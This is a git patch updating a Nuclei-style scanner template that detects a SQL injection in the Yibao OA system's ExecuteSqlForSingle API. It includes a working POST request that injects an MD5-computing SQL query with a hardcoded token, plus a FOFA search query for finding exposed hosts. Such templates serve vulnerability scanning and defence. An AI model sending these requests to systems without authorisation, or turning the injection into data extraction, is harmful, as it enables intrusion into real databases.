From b9b83eadeb0c56cf74404f05ae9bea9743eb25bd Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Mon, 4 Dec 2023 23:35:55 +0530
Subject: [PATCH] Update yibao-sqli.yaml

---
 http/vulnerabilities/other/yibao-sqli.yaml | 27 +++++++++++++---------
 1 file changed, 16 insertions(+), 11 deletions(-)

diff --git a/http/vulnerabilities/other/yibao-sqli.yaml b/http/vulnerabilities/other/yibao-sqli.yaml
index 8473dd38f8..57ae77eb77 100644
--- a/http/vulnerabilities/other/yibao-sqli.yaml
+++ b/http/vulnerabilities/other/yibao-sqli.yaml
@@ -1,34 +1,39 @@
 id: yibao-sqli
 
 info:
-  name: Yibao OA System 'ExecuteSqlForSingle' - SQL Injection
+  name: Yibao OA System - SQL Injection
   author: DhiyaneshDK
   severity: high
   metadata:
-    verified: true
     max-request: 1
+    verified: true
     fofa-query: product="顶讯科技-易宝OA系统"
-  tags: yiboo,sqli
+  tags: yiboo,oa,sqli
 
 variables:
   num: "999999999"
 
 http:
-  - method: POST
-    path:
-      - "{{BaseURL}}/api/system/ExecuteSqlForSingle"
-    headers:
-      Content-Type: application/x-www-form-urlencoded
-    body: "token=zxh&sql=select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','{{num}}')),3,32)&strParameters"
+  - raw:
+      - |
+        POST /api/system/ExecuteSqlForSingle HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        token=zxh&sql=select substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','{{num}}')),3,32)&strParameters
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - '{{md5({{num}})}}'
+          - 'data":"{{md5({{num}})}}'
 
       - type: word
         part: header
         words:
-          - 'application/json'
+          - application/json
+
+      - type: status
+        status:
+          - 200